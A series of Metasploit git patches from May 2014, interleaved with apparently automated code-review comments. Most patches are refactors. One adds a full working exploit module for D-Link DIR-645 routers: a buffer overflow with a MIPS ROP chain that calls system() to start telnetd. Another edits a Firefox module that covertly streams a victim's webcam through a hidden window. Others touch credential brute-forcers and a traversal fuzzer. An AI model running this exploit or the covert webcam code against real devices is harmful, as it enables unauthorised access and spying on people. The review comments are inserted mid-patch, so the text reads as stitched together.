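Review bot: `SUPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES']` (hunk at -11,6 +11,7) is true whenever the variable is set at all, including to `0`, `false` or an empty string, and the constant is spelled differently from the environment variable it mirrors. `SUPPRESS_INFO_MESSAGES = %w[1 true yes].include?(ENV['MSF_SUPPRESS_INFO_MESSAGES'].to_s.downcase)` addresses both, with the `return if` added to `info` in the -91,6 +92,7 hunk renamed to match. The neighbouring `CHECK_OLD_RUBIES` line uses the same `!!ENV[...]` form, so if that is the file's convention, a comment such as `# any value, even empty, enables this` is the smaller change.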
From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 22 May 2014 11:34:04 -0500 Subject: [PATCH 358/853] Add CVE, IBM ref for SameTime modules --- modules/auxiliary/gather/ibm_sametime_enumerate_users.rb | 5 +++++ modules/auxiliary/gather/ibm_sametime_room_brute.rb | 5 +++++ modules/auxiliary/gather/ibm_sametime_version.rb | 5 +++++ 3 files changed, 15 insertions(+) diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index f11c345847..e6875e6d57 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -24,6 +24,11 @@ class Metasploit3 < Msf::Auxiliary [ 'kicks4kittens' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2013-3975' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] + ], 'DefaultOptions' => { 'SSL' => true diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index cff9af79e1..80c1f7a1b3 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -23,6 +23,11 @@ class Metasploit3 < Msf::Auxiliary [ 'kicks4kittens' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2013-3977' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] + ], 'DefaultOptions' => { 'SSL' => true diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index a8454f211d..d2754274d6 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -70,6 +70,11 @@ class Metasploit3 < Msf::Auxiliary [ 'kicks4kittens' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2013-3982' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] + ], 'DefaultOptions' => { 'SSL' => true 
From 1dbe972377f830db390d4a41e913c64b8a96d61b Mon Sep 17 00:00:00 2001 From: sinn3r <wei_chen@rapid7.com> Date: Thu, 22 May 2014 12:18:49 -0500 Subject: [PATCH 359/853] Fix URIPATH / for BrowserExploitServer [SeeRM #8804] Fix URIPATH / for BrowserExploitServer --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d1782616e1..6cd891aa84 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -439,7 +439,7 @@ module Msf # def on_request_uri(cli, request) case request.uri - when get_resource.chomp("/") + when '/', get_resource.chomp("/") # # This is the information gathering stage # From 28459299b205934897294a235f951e700a89dece Mon Sep 17 00:00:00 2001 From: mercd <mercd@users.noreply.github.com> Date: Thu, 22 May 2014 14:16:04 -0700 Subject: [PATCH 360/853] Update ibstat_path.rb Add interface detection, defaulting to en0. --- modules/exploits/aix/local/ibstat_path.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index cb424c1cfe..1ac45dfa97 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb 
@@ -110,8 +110,22 @@ chmod 4555 #{root_file} cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("export PATH") + print_status("Finding interface name...") + iface = "" + cmd_exec("lsdev -Cc if").each_line do |line| + if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/) + iface = line.split(/\s+/)[0] + print_status("Found interface #{iface}.") + break + end + end + if iface == "" + iface = "en0" + print_status("Found no interface, defaulting to en0.") + end + print_status("Triggering vulnerablity...") - cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") + cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null") # The $PATH variable must be restored before the payload is executed # in cases where an euid root shell was gained From ae3c334232e46bc3780ca507a0c10a7e255b0c1f Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 22 May 2014 17:14:35 -0500 Subject: [PATCH 361/853] Getting closer. Still something f'd with local answerer.html. --- lib/msf/core/post/webrtc.rb | 6 ++-- modules/post/firefox/gather/webcam_chat.rb | 36 ++++++++++++---------- 2 files changed, 23 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb index d58c1ecf91..342bd2e737 100644 --- a/lib/msf/core/post/webrtc.rb +++ b/lib/msf/core/post/webrtc.rb 
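Review bot: The interface name read from the `lsdev -Cc if` output is interpolated into the `/usr/bin/ibstat -a -i #{iface}` command line, and the only thing that bounds it is the `^[a-z]+[0-9]+\s+Available` match applied first. A comment saying so, e.g. `# name is limited to [a-z]+[0-9]+ by the match above before it reaches the shell`, would keep a later edit from loosening the pattern unnoticed. The condition uses `and not`, which binds more loosely than `&&`; `if line =~ /^[a-z]+[0-9]+\s+Available/ && line !~ /^lo[0-9]/` is the conventional form, and `iface.empty?` reads better than `iface == ""`. The enclosing method starts and ends outside the hunk.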
@@ -12,18 +12,18 @@ module Msf::Post::WebRTC interface = load_interface('answerer.html') api = load_api_code - tmp_api = Tempfile.new('api.js') + tmp_api = Tempfile.new(['api', '.js']) tmp_api.binmode tmp_api.write(api) tmp_api.close interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path) + interface = interface.gsub(/\=WEBRTCAPIJS\=/, File.basename(tmp_api.path)) interface = interface.gsub(/\=RHOST\=/, rhost) interface = interface.gsub(/\=CHANNEL\=/, channel) interface = interface.gsub(/\=OFFERERID\=/, offerer_id) - tmp_interface = Tempfile.new('answerer.html') + tmp_interface = Tempfile.new(['answerer', '.html']) tmp_interface.binmode tmp_interface.write(interface) tmp_interface.close diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index ee4450bde7..6871e66997 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -36,9 +36,15 @@ class Metasploit3 < Msf::Post result = js_exec(js_payload(server, offerer_id, channel)) - if result.present? - print_status result - connect_video_chat(server, channel, offerer_id) + if datastore['CLOSE'] + print_status "Stream closed." + else + if result.present? + print_status result + connect_video_chat(server, channel, offerer_id) + else + print_warning "No response received" + end end end 
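Review bot: Both `Tempfile.new(['api', '.js'])` and `Tempfile.new(['answerer', '.html'])` are closed without being unlinked, which leaves their removal to the Tempfile finalizer. The files can then vanish whenever the objects are garbage-collected, or linger until the process exits, rather than at a defined point. If the generated page is opened after this method returns, which the hunk does not show, keep the objects referenced for as long as the page is in use and call `tmp_api.unlink` and `tmp_interface.unlink` when it is done. Switching to `File.basename(tmp_api.path)` also relies on both files being created in the same directory, which deserves a short comment.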
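Review bot: In the first webcam_chat.rb hunk, the `else` that immediately opens `if result.present?` can be written as `elsif result.present?`, which removes one nesting level and one `end`. The `datastore['CLOSE']` branch prints "Stream closed." without looking at `result`, so if that is deliberate a comment such as `# close requests do not return a status` would make it clear. The enclosing method starts outside the hunk.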
@@ -63,23 +69,21 @@ class Metasploit3 < Msf::Post end %Q| - (function(send){ - try { - var b64 = Components.utils.import("resource://gre/modules/Services.jsm").atob; - var AppShellService = Components - .classes["@mozilla.org/appshell/appShellService;1"] - .getService(Components.interfaces.nsIAppShellService); + (function(send){ + try { + var AppShellService = Components + .classes["@mozilla.org/appshell/appShellService;1"] + .getService(Components.interfaces.nsIAppShellService); - var html = "#{Rex::Text.encode_base64(interface)}"; - var url = "data:text/html;base64,"+html; - AppShellService.hiddenDOMWindow.open(url, "_self"); - AppShellService.hiddenDOMWindow.moveTo(-55555,-55555); - send("Streaming webcam..."); - } catch (e) { + var html = "#{Rex::Text.encode_base64(interface)}"; + var url = #{url}; + var win = AppShellService.hiddenDOMWindow.open(url, "_self", "width=500,height=500"); + send("Streaming webcam..."); + } catch (e) { send(e); } })(send); - |.gsub(/\s+/, '') + | end end From b85c0b75430ef8a48e5144761f8c8a61e295f76f Mon Sep 17 00:00:00 2001 From: Michael Messner <devnull@s3cur1ty.de> Date: Fri, 23 May 2014 20:51:25 +0200 Subject: [PATCH 362/853] rop to system with telnetd --- .../http/dlink_authentication_rop_system.rb | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_authentication_rop_system.rb diff --git a/modules/exploits/linux/http/dlink_authentication_rop_system.rb b/modules/exploits/linux/http/dlink_authentication_rop_system.rb new file mode 100644 index 0000000000..7f73816900 --- /dev/null +++ b/modules/exploits/linux/http/dlink_authentication_rop_system.rb 
@@ -0,0 +1,125 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it + + HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link authentication.cgi Buffer Overflow', + 'Description' => %q{ + This module exploits an anonymous remote code execution vulnerability on different D-Link routers. + This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the + DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated + environment. They are a little bit different in the first ROP gadget. + }, + 'Author' => + [ + 'Roberto Paleari', # Vulnerability discovery + 'Craig Heffner', # also discovered the vulnerability / help with some parts of this module + 'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on different other routers + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { 'PAYLOAD' => 'generic/shell_bind_tcp' }, + 'References' => + [ + [ 'OSVDB', '95951' ], + [ 'EDB', '27283' ], + [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008' ], #advisory on vendor web site + [ 'URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000' ], #vendor web site of router + [ 'URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt' ] #original advisory + ], + 'Targets' => + [ + [ 'DLink DIR-645 1.03 - start telnetd', + { + 'Offset' => 1011, + 'LibcBase' => 0x2aaf8000, #Router + #'LibcBase' => 0x40854000, # QEMU environment + 'System' 
=> 0x000531FF, # address of system + 'CalcSystem' => 0x000158C8, # calculate the correct address of system + 'CallSystem' => 0x000159CC, # call our system + } + ] + ], + 'DisclosureDate' => 'Feb 08 2013', + 'DefaultTarget' => 0)) + end + + def check + begin + res = send_request_cgi({ + 'uri' => "/authentication.cgi", + 'method' => 'GET' + }) + + if res && [200, 301, 302].include?(res.code) + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + lport = datastore['LPORT'] + cmd = "/usr/sbin/telnetd -p #{lport}" + + print_status("#{peer} - Trying to access the vulnerable URL...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") + end + + # prepare our shellcode that triggers the crash: + shellcode = rand_text_alpha_upper(target['Offset']) # padding + shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system + shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4 + shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system) + + # .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5 + # .text:000159D0 21 28 60 02 move $a1, $s3 # not used + # .text:000159D4 21 30 20 02 move $a2, $s1 # not used + # .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system + # .text:000159DC 09 F8 20 03 jalr $t9 # call system + # .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system + + shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp + shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system) + + # .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget + # .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget + # .text:000158D0 01 00 10 26 
addiu $s0, 1 # s0 our system address - lets calculate the right address + + shellcode << rand_text_alpha_upper(16) # filler in front of our command + shellcode << cmd + + # now lets rock it ... + + print_status("#{peer} - Sending exploit ...") + + res = send_request_cgi({ + 'method' => 'POST', + #'uri' => "/authentication_gdb.cgi", #for debugging on the router + 'uri' => "/authentication.cgi", + 'cookie' => "uid=test", + 'encode_params' => false, + 'vars_post' => { + 'uid' => 'test', + 'password' => 'asd' << shellcode, + } + }) + end +end From f189033e8a2dcb3355a44c3e40f4d46883a9d039 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 14:51:08 -0500 Subject: [PATCH 363/853] OWA bruteforce shouldnt edit datastore (@wchen-r7) This module was written in an era where the defaults for bruteforcing included a lot of lock-inducing behavior, thus, it was quite serious about setting datastore options directly. Also, there was apparently a bug in USER_AS_PASS that this module attempted to avoid by setting the datastore directly, rather than fixing the bug directly. As far as I know, this bug has been long since resolved. --- modules/auxiliary/scanner/http/owa_login.rb | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index 9696f28e3f..edf003f3df 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb 
@@ -93,26 +93,7 @@ class Metasploit3 < Msf::Auxiliary deregister_options('BLANK_PASSWORDS', 'RHOSTS','PASSWORD','USERNAME') end - def cleanup - # Restore the original settings - datastore['BLANK_PASSWORDS'] = @blank_passwords_setting - datastore['USER_AS_PASS'] = @user_as_pass_setting - end - def run - # Store the original setting - @blank_passwords_setting = datastore['BLANK_PASSWORDS'] - - # OWA doesn't support blank passwords or usernames! - datastore['BLANK_PASSWORDS'] = false - - # If there's a pre-defined username/password, we need to turn off USER_AS_PASS - # so that the module won't just try username:username, and then exit. - @user_as_pass_setting = datastore['USER_AS_PASS'] - if not datastore['USERNAME'].nil? and not datastore['PASSWORD'].nil? - print_status("Disabling 'USER_AS_PASS' because you've specified an username/password") - datastore['USER_AS_PASS'] = false - end vhost = datastore['VHOST'] || datastore['RHOST'] From efffbf751ac8b05b9bc5e4d5ade02db747d1c259 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:05:30 -0500 Subject: [PATCH 364/853] PHP module shouldnt zap CMD option (@wchen-r7) As far as I can tell, there is no purpose for this cleanup. No other CMD exec module takes pains to clear out CMD after run, and it looks like a bad idea -- what happens when you rexploit? --- modules/exploits/multi/http/phpldapadmin_query_engine.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 1315ed710e..fb087c952d 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb 
@@ -87,13 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote return res.get_cookies end - def cleanup - # We may not be using php/exe again, so clear the CMD option - if datastore['CMD'] - datastore['CMD'] = nil - end - end - def exploit # if we are using the exec CMD stager # important to check which php functions are disabled From 7f59cf5035613a3bd3e717a045f1de2f1060d632 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:18:54 -0500 Subject: [PATCH 365/853] Ora XID HTTP needn't edit DBUSER (@cellabosm) Looks like copypasta artifacts. DBUSER and DBPASS aren't ever set as options in the module, and the module doesn't include MC's Exploit::ORACLE mixin. It's also from four years ago and doesn't report_auth or anything useful like that, but that's out of scope for this branch. --- modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index bee4244a5e..cac758bf01 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]), Opt::RPORT(8080), ], self.class) - deregister_options('DBUSER','DBPASS') end def run_host(ip) @@ -57,9 +56,9 @@ class Metasploit3 < Msf::Auxiliary fd = CSV.foreach(list) do |brute| - datastore['DBUSER'] = brute[2].downcase - datastore['DBPASS'] = brute[3].downcase - user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}" + dbuser = brute[2].downcase + dbpass = brute[3].downcase + user_pass = "#{dbuser}:#{dbpass}" res = send_request_raw({ 'uri' => '/oradb/PUBLIC/GLOBAL_NAME', 
@@ -72,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary }, 10) if( not res ) - vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") + vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...") next end if (res.code == 200) @@ -89,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary :data => sid, :update => :unique_data ) - print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}") + print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}") users.push(user_pass) else - vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") + vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...") end end #fd.each From f7bfab5a267b596be8f077d56605300bb3ec726d Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:32:04 -0500 Subject: [PATCH 366/853] HTTP traversal shouldnt upcase METHOD (@wchen-r7) If the user wants to use downcased or mixed case HTTP methods, heck, more power to them. If it doesn't work, it doesn't work. No other HTTP module makes this call. --- modules/auxiliary/scanner/http/http_traversal.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index d489e7aab4..9f7a5047cb 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb 
@@ -336,9 +336,6 @@ class Metasploit3 < Msf::Auxiliary datastore['PATH'] = '/' + datastore['PATH'] end - # Some webservers (ie. Apache) might not like the HTTP method to be lower-case - datastore['METHOD'] = datastore['METHOD'].upcase - print_status("Running action: #{action.name}...") # And it's..... "SHOW TIME!!" From 9f78bec457f14579134bc9856a3596bf788f1084 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:43:50 -0500 Subject: [PATCH 367/853] Use normalize_uri (@wchen-r7) Instead of editing the datastore['PATH'], use normalize_uri. Since the purpose of this module is quite fuzz-like, I didn't want to apply the normalize_uri to the whole uri -- the original code merely applied to datastore['PATH'] (which seems like it should be datastore['URI'] really) and then added on a bunch of other stuff to test for traversals. --- .../auxiliary/scanner/http/http_traversal.rb | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 9f7a5047cb..f30e5b1697 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary 1.upto(depth) do |d| file_to_read.each do |f| trigger = base * d - p = datastore['PATH'] + trigger + f + p = normalize_uri(datastore['PATH']) + trigger + f req = ini_request(p) vprint_status("Trying: http://#{rhost}:#{rport}#{p}") res = send_request_cgi(req, 25) @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary if datastore['TRIGGER'].empty? # Found trigger using fuzz() found = true if trigger - uri = datastore['PATH'] + trigger + uri = normalize_uri(datastore['PATH']) + trigger else # Manual check. meh. if datastore['FILE'].empty? 
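Review bot: `normalize_uri(datastore['PATH'])` is now spelled out at every site that builds a request path, in the -106 and -187 hunks here and again in the -195, -211, -234, -261 and -294 hunks that follow, so each site has to be kept in step by hand and the call is repeated inside the loops. A small private helper, for example `def base_path; normalize_uri(datastore['PATH']); end`, used at each site would keep them consistent. The removed code only prepended a missing `/`. If normalize_uri does more than that (it collapses repeated slashes, as far as I know), the helper should carry a comment saying so, because a PATH the user typed is then no longer sent verbatim. All of the affected methods start and end outside their hunks.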
@@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary return end - uri = datastore['PATH'] + trigger + datastore['FILE'] + uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE'] req = ini_request(uri) vprint_status("Trying: http://#{rhost}:#{rport}#{uri}") res = send_request_cgi(req, 25) @@ -211,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary :port => rport, :vhost => datastore['VHOST'], :path => uri, - :params => datastore['PATH'], + :params => normalize_uri(datastore['PATH']), :pname => trigger, :risk => 3, :proof => trigger, @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary # Our trigger already puts us in '/', so our filename doesn't need to begin with that f = f[1,f.length] if f =~ /^\// - req = ini_request(uri = (datastore['PATH'] + trigger + f).chop) + req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop) res = send_request_cgi(req, 25) vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res @@ -261,7 +261,7 @@ class Metasploit3 < Msf::Auxiliary # Our trigger already puts us in '/', so our filename doesn't need to begin with that f = f[1,f.length] if f =~ /^\// - req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop) + req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop) res = send_request_cgi(req, 25) vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res @@ -294,7 +294,7 @@ class Metasploit3 < Msf::Auxiliary # Form the PUT request fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt' - uri = datastore['PATH'] + trigger + fname + uri = normalize_uri(datastore['PATH']) + trigger + fname vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}") req = ini_request(uri) 
@@ -331,11 +331,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - # Make sure datastore['PATH] begins with a '/' - if datastore['PATH'] !~ /^\// - datastore['PATH'] = '/' + datastore['PATH'] - end - print_status("Running action: #{action.name}...") # And it's..... "SHOW TIME!!" From 1aee0f3305c9849ca7483372d383048f9fd49225 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 17:10:27 -0500 Subject: [PATCH 368/853] Warn if it's not UPPERCASE method (@wchen-r7) See the discussion on f7bfab5a26, PR #3386 --- modules/auxiliary/scanner/http/http_traversal.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index f30e5b1697..d7fe81ab4b 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -331,6 +331,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) + # Warn if it's not a well-formed UPPERCASE method + if datastore['METHOD'] !~ /^[A-Z]+$/ + print_warning("HTTP method #{datastore['METHOD']} is not Apache-compliant. Try only UPPERCASE letters.") + end print_status("Running action: #{action.name}...") # And it's..... "SHOW TIME!!" From 8d4d40b8ba5b0c5d5377895369a0173754a9dda3 Mon Sep 17 00:00:00 2001 
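Review bot: The check `datastore['METHOD'] !~ /^[A-Z]+$/` added at the top of run_host uses line anchors, so in Ruby a value that contains a newline still matches as long as one of its lines is all uppercase, and no warning is printed. Use string anchors instead: `if datastore['METHOD'] !~ /\A[A-Z]+\z/`. run_host continues past the end of the hunk.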
From: Christian Mehlmauer <FireFart@gmail.com> Date: Sat, 24 May 2014 00:34:46 +0200 Subject: [PATCH 369/853] Resolved some Set-Cookie warnings --- modules/exploits/multi/http/wikka_spam_exec.rb | 11 ++++++----- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- .../exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 4 ++-- modules/exploits/unix/webapp/foswiki_maketext.rb | 6 +++--- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- .../exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++-- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 4 ++-- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ++-- modules/exploits/unix/webapp/twiki_maketext.rb | 6 +++--- .../exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 ++++---- .../unix/webapp/wp_google_document_embedder_exec.rb | 6 +----- modules/exploits/unix/webapp/zpanel_username_exec.rb | 4 ++-- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- 21 files changed, 41 insertions(+), 44 deletions(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 20d4a365d3..160a553278 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb 
@@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + if res and res.get_cookies + cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") end @@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => login }) - if res and res.headers['Set-Cookie'] =~ /user_name/ - user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || "" - pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || "" + if res and res.get_cookies =~ /user_name/ + c = res.get_cookies + user = c.scan(/(user_name\@\w+=\w+);/)[0] || "" + pass = c.scan(/(pass\@\w+=\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 57ec58c718..47409ba37f 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with("Login failed") end - sess = login.headers['Set-Cookie'] + sess = login.get_cookies dash = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b18a55f292..3153f03bae 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb 
